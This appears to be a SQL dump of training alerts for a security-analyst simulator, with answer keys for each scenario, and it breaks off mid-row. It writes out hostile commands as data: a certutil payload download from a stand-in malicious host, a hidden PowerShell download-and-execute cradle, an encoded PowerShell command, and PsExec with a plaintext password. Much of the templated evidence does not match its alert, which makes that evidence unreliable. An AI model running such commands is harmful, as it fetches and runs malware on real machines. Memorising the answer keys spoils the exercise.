(612, 'Brute Force Login Attempt Detected', 'medium', 'Splunk', 'Multiple failed login attempts were detected from a foreign IP address, indicating a possible brute force attack.', 'Credential Attack', 'T1110', 0, 'closed', NULL, '{\"timestamp\":\"2026-01-11T11:00:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.30\",\"username\":\"admin\",\"hostname\":\"INTERNAL-SERVER\",\"failed_attempts\":25}', '2026-01-09 19:58:44', '2026-02-22 04:55:05', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported in multiple brute force attempts but not confirmed malicious.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Common administrative account targeted by attackers.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The foreign IP showed failed login attempts but without successful access. No further malicious activity detected.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.251Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"INTERNAL-SERVER\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:31:22.251Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"INTERNAL-SERVER\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:30:22.251Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"INTERNAL-SERVER\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:29:22.251Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"INTERNAL-SERVER\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:28:22.251Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"INTERNAL-SERVER\\\",\\\"failed_attempts\\\":25}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(613, 'Suspicious PowerShell Execution Detected with Encoded Command', 'high', 'CrowdStrike', 'A PowerShell process was detected executing an encoded command, indicating possible obfuscation attempts to evade detection.', 'Malware', 'T1086', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-10T19:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.25\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"DESKTOP-01\",\"request_body\":\"\",\"command_line\":\"powershell.exe -enc JAB3AGgAYQB0ACAAJwAnADsAIAAkAHUAcgBsACAAPQAgACcAaAB0AHQAcAA6AC8ALwBlAHgAYQBtAHAAbABlAC4AYwBvAG0AJwA7ACAAIgAkAHIAZQBwACAAJwAnAA==\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-01-10 04:01:28', '2026-02-18 13:55:35', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -enc JAB3AGgAYQB0ACAAJwAnADsAIAAkAHUAcgBsACAAPQAgACcAaAB0AHQAcAA6AC8ALwBlAHgAYQBtAHAAbABlAC4AYwBvAG0AJwA7ACAAIgAkAHIAZQBwACAAJwAnAA==\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command used for obfuscation detected in multiple malware campaigns\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash seen in recent suspicious activity, but not confirmed malicious\"}}],\"expected_actions\":[\"collect_forensics\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of encoded PowerShell commands is a common tactic for malware to evade detection. This activity requires further investigation and containment.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(614, 'Internal Network Lateral Movement via PSExec', 'critical', 'Wazuh', 'An internal system was used to execute a remote command on another internal machine using PSExec, indicating potential lateral movement.', 'Lateral Movement', 'T1077', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-10T21:12:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"192.168.1.75\",\"username\":\"admin\",\"hostname\":\"SERVER-01\",\"command_line\":\"psexec \\\\\\\\192.168.1.75 -u admin -p password123 cmd.exe /c whoami\"}', '2026-01-10 10:01:55', '2026-02-16 18:04:30', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Source IP of the initiating system within the network\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Destination IP of the target system within the network\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"psexec \\\\\\\\192.168.1.75 -u admin -p password123 cmd.exe /c whoami\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"PSExec used for lateral movement, a known technique for spreading malware internally\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of PSExec for remote command execution is a strong indicator of lateral movement within the network. Immediate investigation and host isolation are advised.\"}', 'Advanced', 'EDR', 7, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.253Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-10T21:12:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"192.168.1.75\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"SERVER-01\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.1.75 -u admin -p password123 cmd.exe /c whoami\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.253Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-10T21:12:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"192.168.1.75\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"SERVER-01\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.1.75 -u admin -p password123 cmd.exe /c whoami\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.253Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-10T21:12:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"192.168.1.75\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"SERVER-01\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.1.75 -u admin -p password123 cmd.exe /c whoami\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.253Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-10T21:12:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"192.168.1.75\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"SERVER-01\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.1.75 -u admin -p password123 cmd.exe /c whoami\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.253Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-10T21:12:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"192.168.1.75\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"SERVER-01\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.1.75 -u admin -p password123 cmd.exe /c whoami\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(615, 'Potential Data Exfiltration via Certutil', 'high', 'Splunk', 'Certutil was observed being used to download a file from an external source, a technique often used for data exfiltration or downloading malicious payloads.', 'Data Exfil', 'T1140', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T03:25:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.100\",\"dst_ip\":\"203.0.113.85\",\"username\":\"hsmith\",\"hostname\":\"WORKSTATION-03\",\"command_line\":\"certutil.exe -urlcache -split -f http://malicious.example.com/payload.exe payload.exe\"}', '2026-01-10 07:17:02', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious.example.com/payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL associated with malware distribution\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"certutil.exe -urlcache -split -f http://malicious.example.com/payload.exe payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Certutil used to download potentially malicious file\"}}],\"expected_actions\":[\"block_ip\",\"block_url\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The use of certutil for downloading files from external sources is indicative of data exfiltration or malware download. Further investigation is necessary.\"}', 'Advanced', 'EDR', 7, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.254Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T03:25:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.100\\\",\\\"dst_ip\\\":\\\"203.0.113.85\\\",\\\"username\\\":\\\"hsmith\\\",\\\"hostname\\\":\\\"WORKSTATION-03\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f http://malicious.example.com/payload.exe payload.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.254Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T03:25:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.100\\\",\\\"dst_ip\\\":\\\"203.0.113.85\\\",\\\"username\\\":\\\"hsmith\\\",\\\"hostname\\\":\\\"WORKSTATION-03\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f http://malicious.example.com/payload.exe payload.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.254Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T03:25:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.100\\\",\\\"dst_ip\\\":\\\"203.0.113.85\\\",\\\"username\\\":\\\"hsmith\\\",\\\"hostname\\\":\\\"WORKSTATION-03\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f http://malicious.example.com/payload.exe payload.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.254Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T03:25:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.100\\\",\\\"dst_ip\\\":\\\"203.0.113.85\\\",\\\"username\\\":\\\"hsmith\\\",\\\"hostname\\\":\\\"WORKSTATION-03\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f http://malicious.example.com/payload.exe payload.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.254Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T03:25:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.100\\\",\\\"dst_ip\\\":\\\"203.0.113.85\\\",\\\"username\\\":\\\"hsmith\\\",\\\"hostname\\\":\\\"WORKSTATION-03\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f http://malicious.example.com/payload.exe payload.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(616, 'False Positive: Legitimate Use of MSHTA Detected', 'medium', 'IDS', 'An MSHTA execution was detected, which is commonly used by attackers for executing scripts. However, this instance was identified as a legitimate use case by an internal script.', 'Malware', 'T1218', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T07:40:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.120\",\"dst_ip\":\"\",\"username\":\"serviceaccount\",\"hostname\":\"SERVER-02\",\"command_line\":\"mshta.exe http://intranet.example.com/script.hta\",\"domain\":\"intranet.example.com\"}', '2026-01-10 16:40:24', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.120\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the server executing the script\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"mshta.exe http://intranet.example.com/script.hta\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Legitimate execution of an internal script\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"intranet.example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Internal domain for legitimate business operations\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The detected use of MSHTA was verified to be legitimate for executing an internal script. No malicious activity was confirmed.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.255Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:40:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.120\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"serviceaccount\\\",\\\"hostname\\\":\\\"SERVER-02\\\",\\\"command_line\\\":\\\"mshta.exe http://intranet.example.com/script.hta\\\",\\\"domain\\\":\\\"intranet.example.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.255Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:40:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.120\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"serviceaccount\\\",\\\"hostname\\\":\\\"SERVER-02\\\",\\\"command_line\\\":\\\"mshta.exe http://intranet.example.com/script.hta\\\",\\\"domain\\\":\\\"intranet.example.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.255Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:40:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.120\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"serviceaccount\\\",\\\"hostname\\\":\\\"SERVER-02\\\",\\\"command_line\\\":\\\"mshta.exe http://intranet.example.com/script.hta\\\",\\\"domain\\\":\\\"intranet.example.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.255Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:40:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.120\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"serviceaccount\\\",\\\"hostname\\\":\\\"SERVER-02\\\",\\\"command_line\\\":\\\"mshta.exe http://intranet.example.com/script.hta\\\",\\\"domain\\\":\\\"intranet.example.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.255Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:40:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.120\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"serviceaccount\\\",\\\"hostname\\\":\\\"SERVER-02\\\",\\\"command_line\\\":\\\"mshta.exe http://intranet.example.com/script.hta\\\",\\\"domain\\\":\\\"intranet.example.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(617, 'Advanced Persistent Threat Detected: Multi-hop C2 Communication via Slack', 'critical', 'CrowdStrike', 'An APT group has been detected using a multi-hop C2 communication channel through Slack to control a compromised system. The attack involves memory-only payloads and process hollowing techniques.', 'Malware', 'T1095', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T11:00:22Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.200\",\"username\":\"jdoe\",\"hostname\":\"CORP-DESKTOP01\",\"command_line\":\"powershell.exe -nop -w hidden -c IEX ((New-Object Net.WebClient).DownloadString(\'https://slack.com/api/secret\'))\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"domain\":\"slack.com\"}', '2026-01-11 06:23:43', '2026-02-16 18:02:47', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.200\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1023 times for C2 activities\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell.exe -nop -w hidden -c IEX ((New-Object Net.WebClient).DownloadString(\'https://slack.com/api/secret\'))\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Suspicious PowerShell command indicative of fileless malware\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware sample associated with APT activity\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of Slack as a C2 channel and the memory-only payload suggests a sophisticated APT attack leveraging legitimate services.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(618, 'DGA Domain Detected for Data Exfiltration', 'high', 'Splunk', 'A domain generated algorithmically has been detected, suggesting data exfiltration attempts from an internal server. The domain is associated with fast-flux DNS to evade detection.', 'Data Exfiltration', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T02:45:10Z\",\"event_type\":\"dns_request\",\"src_ip\":\"10.0.0.25\",\"domain\":\"xkjasd1234.info\",\"username\":\"svc-backup\",\"hostname\":\"SRV-BACKUP01\"}', '2026-01-10 18:00:27', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the server involved in suspicious DNS requests\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"xkjasd1234.info\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain identified as part of a DGA associated with data exfiltration\"}}],\"expected_actions\":[\"block_ip\",\"block_domain\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The DGA domain and fast-flux DNS indicate a sophisticated data exfiltration attempt, likely part of an ongoing APT campaign.\"}', 'Expert', 'SIEM', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.258Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T02:45:10Z\\\",\\\"event_type\\\":\\\"dns_request\\\",\\\"src_ip\\\":\\\"10.0.0.25\\\",\\\"domain\\\":\\\"xkjasd1234.info\\\",\\\"username\\\":\\\"svc-backup\\\",\\\"hostname\\\":\\\"SRV-BACKUP01\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.258Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T02:45:10Z\\\",\\\"event_type\\\":\\\"dns_request\\\",\\\"src_ip\\\":\\\"10.0.0.25\\\",\\\"domain\\\":\\\"xkjasd1234.info\\\",\\\"username\\\":\\\"svc-backup\\\",\\\"hostname\\\":\\\"SRV-BACKUP01\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.258Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 